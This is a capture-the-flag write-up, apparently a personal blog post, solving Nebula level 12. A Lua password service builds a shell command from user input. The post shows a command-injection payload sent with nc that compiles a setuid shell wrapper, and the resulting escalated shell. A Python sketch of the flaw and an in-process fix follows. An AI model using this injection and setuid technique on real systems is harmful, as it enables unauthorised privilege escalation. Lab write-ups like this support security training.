Monday, September 3, 2012

nebula level12

Level details:
There is a backdoor process listening on port 50001.
Source code:
This one is super easy. It's a service written in Lua that asks you for a password. It generates the SHA-1 hash of the password and compares it against a hardcoded hash. The comparison is a distraction: the real problem resides in the hash function itself, which puts the password variable as is into the command that generates the SHA-1 hash. This makes it a simple command injection vulnerability.
level12@nebula:~$ cat > /tmp/shell.c
#include <unistd.h>
#include <stdlib.h>

int main()
{
    int euid = geteuid();

    setresuid(euid, euid, euid);
    system("sh");
    return 0;
}
level12@nebula:~$ echo '; cc -o /tmp/flag12_sh /tmp/shell.c; chmod +s /tmp/flag12_sh; echo' | nc localhost 50001
Password: Better luck next time
level12@nebula:~$ /tmp/flag12_sh
sh-4.2$ id
uid=987(flag12) gid=1013(level12) egid=987(flag12) groups=987(flag12),1013(level12)
sh-4.2$ getflag
You have successfully executed getflag on a target account
Still worth a flag though.
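The flaw and its fix, as an added example that is not the level's Lua source or code from this post: a Python sketch of the same pattern, showing how a shell tokenizes the concatenated command and how hashing in-process removes the shell entirely. The function names, the command string layout and the placeholder password are assumptions made for illustration.

```python
import hashlib
import hmac
import shlex

# Constructed sample: SHA-1 of a placeholder password, not the hash
# hardcoded in the level's service.
EXPECTED_SHA1 = hashlib.sha1(b"example-password").hexdigest()

SHELL_OPERATORS = {";", "|", "||", "&", "&&", ">", ">>", "<", "(", ")"}


def unsafe_command(password):
    """The flawed pattern: input concatenated into a command string.
    Returned for inspection only; this example never executes it."""
    return "echo " + password + " | sha1sum"


def operators_in(command):
    """Tokenize roughly as a POSIX shell would and list the control
    operators. This shows why input becomes code; it is not a filter."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    try:
        return [tok for tok in lexer if tok in SHELL_OPERATORS]
    except ValueError:
        # An unbalanced quote in the input already changed the parse.
        return ["<unterminated quote>"]


def check_password(password):
    """Hardened check: hash in-process so no shell ever parses the input,
    and compare in constant time."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest()
    return hmac.compare_digest(digest, EXPECTED_SHA1)


if __name__ == "__main__":
    for sample in ("example-password", "pw; true"):  # constructed inputs
        print(repr(sample),
              "operators:", operators_in(unsafe_command(sample)),
              "accepted:", check_password(sample))
```

An ordinary password leaves only the intended pipe in the command, while input containing `;` adds a second command boundary; the in-process check treats both inputs as plain bytes.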

~ Dmitry
